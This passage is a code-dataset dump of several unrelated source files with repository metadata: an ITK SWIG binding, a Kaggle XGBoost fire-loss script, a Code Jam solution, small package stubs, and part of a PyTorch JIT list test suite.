return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetKernelImage(self)
def SetNormalize(self, _arg: 'bool const') -> "void":
"""SetNormalize(itkConvolutionImageFilterBaseIUS3IUS3 self, bool const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetNormalize(self, _arg)
def GetNormalize(self) -> "bool":
"""GetNormalize(itkConvolutionImageFilterBaseIUS3IUS3 self) -> bool"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetNormalize(self)
def NormalizeOn(self) -> "void":
"""NormalizeOn(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOn(self)
def NormalizeOff(self) -> "void":
"""NormalizeOff(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOff(self)
SAME = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SAME
VALID = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_VALID
def SetOutputRegionMode(self, _arg: 'itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType const') -> "void":
"""SetOutputRegionMode(itkConvolutionImageFilterBaseIUS3IUS3 self, itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType const _arg)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionMode(self, _arg)
def GetOutputRegionMode(self) -> "itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType":
"""GetOutputRegionMode(itkConvolutionImageFilterBaseIUS3IUS3 self) -> itkConvolutionImageFilterBaseIUS3IUS3::OutputRegionModeType"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetOutputRegionMode(self)
def SetOutputRegionModeToSame(self) -> "void":
"""SetOutputRegionModeToSame(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToSame(self)
def SetOutputRegionModeToValid(self) -> "void":
"""SetOutputRegionModeToValid(itkConvolutionImageFilterBaseIUS3IUS3 self)"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToValid(self)
__swig_destroy__ = _itkConvolutionImageFilterBasePython.delete_itkConvolutionImageFilterBaseIUS3IUS3
def cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS3IUS3 *":
"""cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS3IUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_cast(obj)
cast = staticmethod(cast)
def New(*args, **kargs):
"""New() -> itkConvolutionImageFilterBaseIUS3IUS3
Create a new object of the class itkConvolutionImageFilterBaseIUS3IUS3 and set the input and the parameters if some
named or non-named arguments are passed to that method.
New() tries to assign all the non named parameters to the input of the new objects - the
first non named parameter in the first input, etc.
The named parameters are used by calling the method with the same name prefixed by 'Set'.
Ex:
itkConvolutionImageFilterBaseIUS3IUS3.New( reader, Threshold=10 )
is (most of the time) equivalent to:
obj = itkConvolutionImageFilterBaseIUS3IUS3.New()
obj.SetInput( 0, reader.GetOutput() )
obj.SetThreshold( 10 )
"""
obj = itkConvolutionImageFilterBaseIUS3IUS3.__New_orig__()
import itkTemplate
itkTemplate.New(obj, *args, **kargs)
return obj
New = staticmethod(New)
itkConvolutionImageFilterBaseIUS3IUS3.SetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetBoundaryCondition = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetBoundaryCondition, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetKernelImage, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetKernelImage = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetKernelImage, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetNormalize, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetNormalize = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetNormalize, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.NormalizeOn = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOn, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.NormalizeOff = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_NormalizeOff, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.GetOutputRegionMode = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_GetOutputRegionMode, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetOutputRegionModeToSame = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToSame, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3.SetOutputRegionModeToValid = new_instancemethod(_itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_SetOutputRegionModeToValid, None, itkConvolutionImageFilterBaseIUS3IUS3)
itkConvolutionImageFilterBaseIUS3IUS3_swigregister = _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_swigregister
itkConvolutionImageFilterBaseIUS3IUS3_swigregister(itkConvolutionImageFilterBaseIUS3IUS3)
def itkConvolutionImageFilterBaseIUS3IUS3_cast(obj: 'itkLightObject') -> "itkConvolutionImageFilterBaseIUS3IUS3 *":
"""itkConvolutionImageFilterBaseIUS3IUS3_cast(itkLightObject obj) -> itkConvolutionImageFilterBaseIUS3IUS3"""
return _itkConvolutionImageFilterBasePython.itkConvolutionImageFilterBaseIUS3IUS3_cast(obj)
def convolution_image_filter_base(*args, **kwargs):
"""Procedural interface for ConvolutionImageFilterBase"""
import itk
instance = itk.ConvolutionImageFilterBase.New(*args, **kwargs)
return instance.__internal_call__()
def convolution_image_filter_base_init_docstring():
import itk
import itkTemplate
if isinstance(itk.ConvolutionImageFilterBase, itkTemplate.itkTemplate):
convolution_image_filter_base.__doc__ = itk.ConvolutionImageFilterBase.values()[0].__doc__
else:
convolution_image_filter_base.__doc__ = itk.ConvolutionImageFilterBase.__doc__
| [
"274065539@qq.com"
] | 274065539@qq.com |
f6b212a659c9e278260eae7b8179462cedbaae43 | b146e577c9661a672ae8bc147ad38760f31619c7 | /fire-xgb.py | 88366b836bf084ed3c5ad9bf74117d2a35675676 | [] | no_license | xuerchen/kaggle-peril-fire-loss-18th-solution | eaa99701a07f1897c455e7d81079a23481025983 | 358a1aa27a390200eea66e7d45f13e35de354918 | refs/heads/master | 2020-12-24T16:59:23.159925 | 2014-09-16T03:36:57 | 2014-09-16T03:36:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,700 | py | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
#%matplotlib inline
import numpy as np
import pandas as pd
from sklearn.linear_model import Lars,Ridge, Lasso, SGDClassifier,SGDRegressor,LogisticRegression,BayesianRidge
from sklearn.ensemble import RandomForestRegressor,GradientBoostingRegressor
from sklearn.preprocessing import scale
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
# <codecell>
import inspect
import os
import sys
code_path = os.path.join(
os.path.split(inspect.getfile(inspect.currentframe()))[0], "../../kaggle-fire/python")
sys.path.append(code_path)
import xgboost as xgb
# <codecell>
# <codecell>
def weighted_gini(act,pred,weight):
df = pd.DataFrame({"act":act,"pred":pred,"weight":weight})
df = df.sort('pred',ascending=False)
df["random"] = (df.weight / df.weight.sum()).cumsum()
total_pos = (df.act * df.weight).sum()
df["cum_pos_found"] = (df.act * df.weight).cumsum()
df["lorentz"] = df.cum_pos_found / total_pos
n = df.shape[0]
#df["gini"] = (df.lorentz - df.random) * df.weight
#return df.gini.sum()
gini = sum(df.lorentz[1:].values * (df.random[:-1])) - sum(df.lorentz[:-1].values * (df.random[1:]))
return gini
def normalized_weighted_gini(act,pred,weight):
return weighted_gini(act,pred,weight) / weighted_gini(act,act,weight)
def xgb_train_predict(data,label,test):
xgmat = xgb.DMatrix( data, label=label,missing=-999)
test_size = test.shape[0]
param = {}
param['objective'] = 'binary:logitraw'
weight = data * float(test_size) / len(label)
sum_wpos = sum( weight[i] for i in range(len(label)) if label[i] != 0 )
sum_wneg = sum( weight[i] for i in range(len(label)) if label[i] == 0 )
# param['scale_pos_weight'] = sum_wneg/sum_wpos
# param['booster_type']=1
param['bst:eta'] = 0.2
param['bst:max_depth'] = 2
param['eval_metric'] = 'auc'
param['silent'] = 1
param['nthread'] = 16
plst = list(param.items())#+[('eval_metric', 'ams@0.15')]
watchlist = [ (xgmat,'train') ]
num_round = 55 # 48 is good
# print ('loading data end, start to boost trees')
bst = xgb.train( plst, xgmat, num_round, watchlist );
# save out model
#bst.save_model('higgs.model')
#modelfile = 'higgs.model'
xgmat = xgb.DMatrix(test,missing=-999)
#bst = xgb.Booster({'nthread':16})
#bst.load_model( modelfile )
ypred = bst.predict( xgmat )
return ypred
# good: 0.2,2,40 -> 0.32
# <codecell>
di='../../data/'
print 'start reading data'
train = pd.read_csv(di+'train.csv')
# <markdowncell>
# # clean data
# <codecell>
vvar=[]
for i in range(1,10):
vvar.append('var'+str(i))
# get categorical feature
vv=train[vvar]
# <codecell>
allv={}
rc=[]
for i in range(1,10):
col='var'+str(i)
allv[col]= np.unique(vv[col])
for j in allv[col]:
xx=(vv[col][vv[col]==j].shape[0])*1.0/(vv.shape[0])
# only keep feature that has less than 50% Z
if xx<0.1 and j=='Z':
print col,'percentage of Z',xx
rc.append(col)
# <codecell>
vr=vv[rc] # just keep var 4,7,8,9
# <codecell>
# <codecell>
from sklearn import feature_extraction
def one_hot_dataframe(data, cols, replace=False):
vec = feature_extraction.DictVectorizer()
mkdict = lambda row: dict((col, row[col]) for col in cols)
#vecData = pd.DataFrame(vec.fit_transform(data[cols].to_dict(outtype='records')).toarray())
vecData = pd.DataFrame(vec.fit_transform(data[cols].apply(mkdict, axis=1)).toarray())
vecData.columns = vec.get_feature_names()
vecData.index = data.index
if replace:
data = data.drop(cols, axis=1)
data = data.join(vecData)
return (data, vecData)
# <codecell>
# fast one-step encoder
vr, vr_n = one_hot_dataframe(vr,rc, replace=True)
# <codecell>
weather=[]
for i in range(1,237):
weather.append('weatherVar'+str(i))
wvar=np.array(train[weather])
for i,c in enumerate(wvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
wvar[:,i]=c
# <codecell>
geo=[]
for i in range(1,38):
geo.append('geodemVar'+str(i))
gvar=np.array(train[geo])
for i,c in enumerate(gvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
gvar[:,i]=c
# <codecell>
# get var 10 ~ var 17 and crimevar
var=[]
for i in range(8):
var.append('var'+str(i+10))
crime=[]
for i in range(9):
crime.append('crimeVar'+str(i+1))
t_var=np.array(train[var])
for i,c in enumerate(t_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
t_var[:,i]=c
tc_var=np.array(train[crime])
for i,c in enumerate(tc_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
tc_var[:,i]=c
# <codecell>
#Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr,wvar[:,102:103],wvar[:,152:153],gvar[:,30:32]], axis = 1)
#Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr,wvar[:,102:103],wvar[:,152:153],gvar[:,30:32]], axis = 1) # good sub-xgb-wg
Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr,wvar[:,[102,152]],gvar[:,[30,31]]], axis = 1)
#Xtrain = np.concatenate([t_var[:,[0]+range(2,8)],vr], axis = 1)
Wtrain=t_var[:,1]
# <codecell>
Xtrain=np.hstack((Xtrain,np.matrix(Wtrain).T))
ytrain=train['target']
test = pd.read_csv(di+'test.csv')
sample = pd.read_csv(di+'sampleSubmission.csv')
ts_var=np.array(test[var])
for i,c in enumerate(ts_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
ts_var[:,i]=c
tcs_var=np.array(test[crime])
for i,c in enumerate(tcs_var.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
tcs_var[:,i]=c
wsvar=np.array(test[weather])
for i,c in enumerate(wsvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
wsvar[:,i]=c
gsvar=np.array(test[geo])
for i,c in enumerate(gsvar.T):
c[np.isnan(c)]=np.mean(c[~np.isnan(c)])
gsvar[:,i]=c
vt=test[rc]
vt, vt_n = one_hot_dataframe(vt,rc, replace=True)
#Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,wsvar[:,102:103],wsvar[:,152:153],gsvar[:,30:32],gsvar[:,0:1]], axis = 1)
Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,wsvar[:,[102,152]],gsvar[:,[30,31]]], axis = 1)
#the setting above is for submission-sk-xgb-wg
#Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,tcs_var[:,-2:-1],wsvar[:,102:103],wsvar[:,152:153],wsvar[:,91:92],wsvar[:,166:167],gsvar[:,30:32],gsvar[:,0:1]], axis = 1)
#Xtest = np.concatenate([ts_var[:,[0]+range(2,8)],vt,wsvar[:,102:103],wsvar[:,152:153]], axis = 1)
Wtest=ts_var[:,1]
#Xtest=scale(Xtest)
Xtest=np.hstack((Xtest,np.matrix(Wtest).T))
yp=xgb_train_predict(Xtrain[:,:-1],np.array(ytrain),Xtest[:,:-1])
sample['target'] = yp
print 'write back'
#sample.to_csv('submission-xgb-wg4-28-log-rounds140.csv', index = False)
sample.to_csv('submission-test.csv', index = False)
| [
"xuer.chen.human@gmail.com"
] | xuer.chen.human@gmail.com |
f53ad4cb5c53619890ba0d307211da71601ebe34 | 9caaaa8117db574a0395de8dc1720772b03b8ac5 | /ghost/formats/__init__.py | 05321f958174bc285cc52ecd909db084098168de | [
"MIT"
] | permissive | nelpy/ghost | 4a71cb105926ffe1564e36df01b4dc51c1dd9322 | d2dc56425a25ff6a987c9f25b3630e58fdf1a285 | refs/heads/master | 2021-06-15T14:38:26.900854 | 2021-04-05T14:23:31 | 2021-04-05T14:23:31 | 179,384,831 | 9 | 1 | MIT | 2021-02-02T16:41:28 | 2019-04-03T23:19:58 | Python | UTF-8 | Python | false | false | 105 | py | """Tools to go from one format to another"""
from .preprocessing import *
from .postprocessing import *
| [
"jchutrue@gmail.com"
] | jchutrue@gmail.com |
ad98b95a0f4d708bfa986b7026a5286b48cfdedd | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_1483488_0/Python/oneup/probC.py | 82474b8652c0745bee94db5539394b83c464a142 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 778 | py | import sys
import math
def num_digits(x):
return math.ceil(math.log(x+1) / math.log(10))
def rotate(x,d):
#print >>sys.stderr,x,d
mod = 10**(d-1)
return (x%mod)*10 + (x/mod)
def test(A,B):
total = 0
d = 0
x = A
while x:
d += 1
x /= 10
for n in xrange(A,B+1):
#print >>sys.stderr,n
m = rotate(n,d)
while m != n: #justifiable
if A <= n < m <= B:
#print >>sys.stderr,n,m
total += 1
m = rotate(m,d)
return total
T = int(raw_input())
for t in xrange(T):
A,B = map(int,raw_input().split())
print >>sys.stderr, t
print "Case #%d:" % (t+1), test(A,B)
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
3f40de3bf8ea34878ac89bbf2ce79c907140ae72 | f11168c145b16632dff06fc1801116d97fa86964 | /python/__main__.py | 195b6842bf5b2a19bb41b338ae8a7abeaf7d7486 | [] | no_license | AJIADb9/minecraft-utils | 2c9c7d00d9c35307498209d3943db230b2562fba | 6c93bace91feac443c7f6a828e4eb81b41810a19 | refs/heads/main | 2023-06-14T03:09:40.990191 | 2021-06-20T21:39:41 | 2021-06-20T21:39:41 | 378,503,590 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | import environment
def main():
if not environment.check_env():
print("WARN: something went wrong")
if __name__ == '__main__':
main()
| [
"ajiadb9@bgd.team"
] | ajiadb9@bgd.team |
1bda0b007453d3e75a766eb1ed7fb22ff4a6d133 | d3bfb78ec7bf3e28503416be1ac58b1170bc8742 | /test/jit/test_list_dict.py | 7a1a074cafe9547ee7f143e097e78d273035860b | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | SimonZsx/pytorch | 28718a6d49fea2ef10dcc49e6231290dd0a23fd9 | 6401b2ccbc1dfa81b96983d8b35e885839847395 | refs/heads/master | 2022-11-27T22:20:16.841950 | 2020-07-26T12:33:10 | 2020-07-26T12:33:10 | 273,522,068 | 1 | 0 | NOASSERTION | 2020-06-19T15:05:57 | 2020-06-19T15:05:56 | null | UTF-8 | Python | false | false | 46,145 | py | import os
import sys
import inspect
from typing import Dict, List, Optional, Tuple
from textwrap import dedent
from collections import OrderedDict
import torch
from torch.testing import FileCheck
from torch import Tensor
# Make the helper files in test/ importable
pytorch_test_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(pytorch_test_dir)
from torch.testing._internal.jit_utils import JitTestCase
if __name__ == '__main__':
raise RuntimeError("This test file is not meant to be run directly, use:\n\n"
"\tpython test/test_jit.py TESTNAME\n\n"
"instead.")
class TestList(JitTestCase):
def test_in_check(self):
def int_in(x):
# type: (List[int]) -> bool
return 2 in x
self.checkScript(int_in, ([1, 2, 3],))
self.checkScript(int_in, ([1, 3, 3],))
def float_in(x):
# type: (List[float]) -> bool
return 2. in x
self.checkScript(float_in, ([1., 2., 3.],))
self.checkScript(float_in, ([1., 3., 3.],))
def str_in(x):
# type: (List[str]) -> bool
return 'hi' in x
self.checkScript(str_in, (['not', 'here'],))
self.checkScript(str_in, (['hi', 'bye'],))
self.checkScript(str_in, ([],))
def test_list_literal(self):
def reassign():
x = [1]
if True:
x = [2, 3]
return
self.checkScript(reassign, (), optimize=False)
def reassign_arity_change():
x = [1]
if True:
x = [1, 2, 3]
return
self.checkScript(reassign_arity_change, (), optimize=False)
def reassign_from_empty_literal():
x = []
if True:
x = [1, 2, 3]
return
with self.assertRaisesRegex(RuntimeError, r"previously has type List\[Tensor\]"):
self.checkScript(reassign_from_empty_literal, (), optimize=False)
def reassign_from_empty_builtin():
x = torch.jit.annotate(List[int], [])
if True:
x = [1, 2, 3]
y = torch.jit.annotate(List[float], [])
if True:
y = [1.0, 2.0, 3.0]
z = []
if True:
z = [torch.randn([1])]
return
self.checkScript(reassign_from_empty_builtin, (), optimize=False)
def reassign_bad_type():
x = [1]
if True:
x = [1.0]
return
with self.assertRaisesRegex(RuntimeError, "previously has type"):
self.checkScript(reassign_bad_type, (), optimize=False)
def reassign_nested():
x = torch.jit.annotate(List[int], [])
if True:
x = [1, 2, 3]
if True:
x = [1.0]
return
with self.assertRaisesRegex(RuntimeError, "previously has type"):
self.checkScript(reassign_nested, (), optimize=False)
def test_del(self):
def inputs():
return [1, 2, 3, 4]
def fn(x):
# type: (List[int]) -> List[int]
del x[1]
return x
python_out = fn(inputs())
# checkScript reuses the same object, but here it's being mutated so do
# it manually
cu = torch.jit.CompilationUnit()
cu.define(dedent(inspect.getsource(fn)))
self.assertEqual(cu.fn(inputs()), python_out)
self.assertEqual(torch.jit.script(fn)(inputs()), python_out)
@torch.jit.script
def fn2(x):
# type: (List[int]) -> List[int]
del x[100]
return x
with self.assertRaisesRegex(RuntimeError, "out of range"):
fn2([])
with self.assertRaisesRegex(RuntimeError, "deletion at a single index"):
@torch.jit.script
def fn(x):
# type: (List[int]) -> List[int]
del x[1:3]
return x
def test_min_bool_list(self):
def jit_min_list(a, b):
# type: (List[bool], List[bool]) -> List[bool]
return min(a, b)
self.checkScript(jit_min_list, ([True, False], [False, True]))
def test_min_max_list(self):
def jit_min_list(a, b):
# type: (List[int], List[int]) -> List[int]
return min(a, b)
def jit_min_list_float(a, b):
# type: (List[float], List[float]) -> List[float]
return min(a, b)
def jit_min_list_bool(a, b):
# type: (List[bool], List[bool]) -> List[bool]
return min(a, b)
def run_tests(func, a, b):
for t in zip(a, b):
self.checkScript(func, t)
args_left_int = [[1, 8, 8], [2, 1, 1], [], [2], [1], [1, 2, 3]]
args_right_int = [[2, 1, 1], [1, 8, 8], [], [1], [], [1, 2]]
run_tests(jit_min_list, args_left_int, args_right_int)
args_left_float = [[1., 8., 8.], [2., 1., 1.], [], [2.], [1.], [1., 2., 3.]]
args_right_float = [[2., 1., 1.], [1., 8., 8.], [], [1.], [], [1., 2.]]
run_tests(jit_min_list_float, args_left_float, args_right_float)
args_left_bool = [[], [], [], [False], [True], [False, True], [True, True],
[False, False, False], [False, False, True]]
args_right_bool = [[], [False], [True], [True], [False], [True, True],
[False, True], [False, False, True], [False, False, False]]
run_tests(jit_min_list_bool, args_left_bool, args_right_bool)
def jit_max_list(a, b):
# type: (List[int], List[int]) -> List[int]
return max(a, b)
def jit_max_list_float(a, b):
# type: (List[float], List[float]) -> List[float]
return max(a, b)
def jit_max_list_bool(a, b):
# type: (List[bool], List[bool]) -> List[bool]
return max(a, b)
args_left_int = [[1, 8, 8], [8, 1, 1], [], [1], [], [1, 2]]
args_right_int = [[8, 1, 1], [1, 8, 8], [], [2], [1], [1, 2, 3]]
run_tests(jit_max_list, args_left_int, args_right_int)
args_left_float = [[1., 8., 8.], [8., 1., 1.], [], [1.], [], [1., 2.]]
args_right_float = [[8., 1., 1.], [1., 8., 8.], [], [2.], [1.], [1., 2., 3.]]
run_tests(jit_max_list_float, args_left_float, args_right_float)
run_tests(jit_max_list_bool, args_left_bool, args_right_bool)
def test_list_gather(self):
def index():
a = [1, 2, 3]
return a[1]
self.checkScript(index, ())
def negative_index():
a = [1, 2, 3]
return a[-1]
self.checkScript(negative_index, ())
def bad_index():
a = [1, 2, 3]
return a[4]
self.checkScriptRaisesRegex(bad_index, (), Exception,
"list index out of range")
def bad_negative_index():
a = [1, 2, 3]
return a[-5]
self.checkScriptRaisesRegex(bad_negative_index, (), Exception,
"list index out of range")
def test_list_len(self):
def func():
a = [1, 2, 3]
return len(a) == 3
self.checkScript(func, ())
def func2():
a = []
return len(a) == 0
self.checkScript(func2, ())
def test_list_ops(self):
def test_equality():
a = [1, 2, 3]
b = [1, 2, 3]
return a == b
self.checkScript(test_equality, (), optimize=True)
def test_inequality():
a = [1, 2, 3]
b = [1, 2, 3]
return a != b
self.checkScript(test_equality, (), optimize=True)
def test_non_equality():
a = [1, 2, 3]
b = [3]
return a == b
self.checkScript(test_non_equality, (), optimize=True)
def test_non_inequality():
a = [1, 2, 3]
b = [3]
return a != b
self.checkScript(test_non_equality, (), optimize=True)
def test_list_equality_as_cond():
a = [1, 2, 3]
b = [3]
if a == b:
c = 1
else:
c = 2
return c
self.checkScript(test_list_equality_as_cond, (), optimize=True)
def test_list_add():
a = [1, 2, 3]
b = [2]
c = a + b
return c == [1, 2, 3, 2]
self.checkScript(test_list_add, (), optimize=True)
def test_list_add_empty():
a = [1, 2, 3]
b = torch.jit.annotate(List[int], [])
c = a + b
return c == [1, 2, 3]
self.checkScript(test_list_add_empty, (), optimize=True)
def test_tensor_list_equality():
t1 = torch.ones([1, 1])
t2 = torch.ones([1, 1])
x = [t1, t2]
y = [t2, t1]
return x == y
self.checkScript(test_tensor_list_equality, (), optimize=True)
def test_invalid_list_equality():
t1 = torch.ones([2, 2])
t2 = torch.ones([2, 2])
x = [t1, t2]
y = [t2, t1]
# will throw since the tensors have more than one element
return x == y
self.checkScriptRaisesRegex(
test_invalid_list_equality,
(),
RuntimeError,
"Boolean value of Tensor")
def test_list_sort(self):
template = dedent('''
def func():
li_1 = {list_create}
li_2 = {list_create}
li_3 = {list_create}
li_1.sort()
li_2.sort(reverse=True)
li_4 = sorted(li_3)
return li_1, li_2, li_3, li_4
''')
lists = ["[]", "[1, 3, 2]", "[True, False, True]", "[1.2, .2, 3.2]",
"[torch.tensor(1.0), torch.tensor(0.2), torch.tensor(0.5)]",
"[torch.tensor(5), torch.tensor(-2), torch.tensor(4)]"]
for li in lists:
code = template.format(list_create=li)
scope = {}
exec(code, globals(), scope)
cu = torch.jit.CompilationUnit(code)
t1 = cu.func()
t2 = scope['func']()
self.assertEqual(t1, t2)
def test_fail(x):
# type: (List[Tensor]) -> List[Tensor]
x.sort()
return x
self.checkScriptRaisesRegex(test_fail, (([torch.zeros([2]), torch.zeros([2])],)), Exception,
"Boolean value of Tensor with more than one value")
@torch.jit.script
def test_mutation():
a = [1, 2, 3]
a.sort()
return a
test_mutation()
FileCheck().check("aten::sort").run(test_mutation.graph_for())
def test_sorted_copy():
a = [torch.tensor(2), torch.tensor(0), torch.tensor(1)]
b = sorted(a)
a[0] = torch.tensor(10)
return a, b
self.checkScript(test_sorted_copy, ())
def test_list_slice(self):
def test_regular_slice():
a = [0, 1, 2, 3, 4]
return a[2:3] == [2]
self.checkScript(test_regular_slice, ())
def test_open_ended_slice():
a = [0, 1, 2, 3, 4]
return a[2:] == [2, 3, 4]
self.checkScript(test_open_ended_slice, ())
def test_open_ended_slice2():
a = [0, 1, 2, 3, 4]
return a[:2] == [0, 1]
self.checkScript(test_open_ended_slice2, ())
def test_negative_slice():
a = [0, 1, 2, 3, 4]
return a[:-1] == [0, 1, 2, 3]
self.checkScript(test_negative_slice, ())
def test_negative_slice2():
a = [0, 1, 2, 3, 4]
return a[-3:-1] == [2, 3]
self.checkScript(test_negative_slice2, ())
def test_backward_slice():
a = [0, 1, 2, 3, 4]
return a[3:2] == torch.jit.annotate(List[int], [])
self.checkScript(test_backward_slice, ())
def test_over_slice():
a = [0, 1, 2, 3, 4]
return a[3:10] == [3, 4]
self.checkScript(test_backward_slice, ())
def test_mutable_list_append(self):
def test_append():
a = [0, 1]
a.append(2)
a.append(3)
return a == [0, 1, 2, 3]
self.checkScript(test_append, ())
def test_comprehensions_basic(self):
def comp(l):
# type: (List[int]) -> List[int]
n = [x * 3 for x in l]
return n
comp([1, 2, 3])
self.checkScript(comp, ([1, 2, 3],))
def test_comprehensions_basic_float(self):
def comp(l):
# type: (List[float]) -> List[float]
n = [x * 3 for x in l]
return n
self.checkScript(comp, ([1.0, 2.0, 3.0],))
def test_comprehensions_two_comps(self):
@torch.jit.script
def comp(l1, l2):
# type: (List[int], List[int]) -> List[int]
n = [x * 3 for x in l1]
n2 = [x + 2 for x in l2]
return n + n2
self.assertEqual(comp([1, 2, 3], [4, 5]), [3, 6, 9, 6, 7])
def test_comprehension_out_type_not_in_type(self):
def list_cast():
# type: () -> int
li = [int(i) for i in [torch.tensor(0), torch.tensor(1), torch.tensor(2)]]
return li[0] + li[1] + li[2]
self.checkScript(list_cast, ())
def test_comprehension_iterable(self):
def test_func(fn, inputs):
self.assertEqual(fn(*inputs), torch.jit.script(fn)(*inputs))
def foo(names, results):
# type: (List[int], List[int]) -> List[Tuple[int, int]]
return [(k + 5, v - 2) for k, v in zip(names, results)]
test_func(foo, ([1, 2, 4], [4, 7, 9]))
test_func(foo, ([5], [4, 7, 9]))
def fn(x):
# type: (int) -> List[int]
return [i for i in range(x)] # noqa: C416
test_func(fn, (9,))
test_func(fn, (0,))
test_func(fn, (-1,))
def changes_type():
a = [float(i) for i in range(5)]
b = [float(i) for i in [1, 2, 3, 4]]
c = [(float(i), j) for i, j in enumerate([1, 2, 3, 8])]
return a, b, c
test_func(changes_type, ())
def test_zero_iter():
return [str(i) for i, j in zip("", "")]
test_func(test_zero_iter, ())
def test_mutable_list_append_2(self):
def test_append_2():
a = [0, 1]
a.append(2)
a = [1]
a.append(4)
return a == [1, 4]
self.checkScript(test_append_2, ())
def test_mutable_list_append_if(self):
def test_append_if():
a = [1]
if True:
a.append(4)
return a == [1, 4]
self.checkScript(test_append_if, ())
def test_mutable_list_append_if_else(self):
def test_append_if_else():
a = [1]
if False:
a.append(4)
else:
a.append(10)
return a == [1, 10]
self.checkScript(test_append_if_else, ())
def test_mutable_list_append_loop(self):
def test_append_loop():
a = torch.jit.annotate(List[int], [])
for i in range(5):
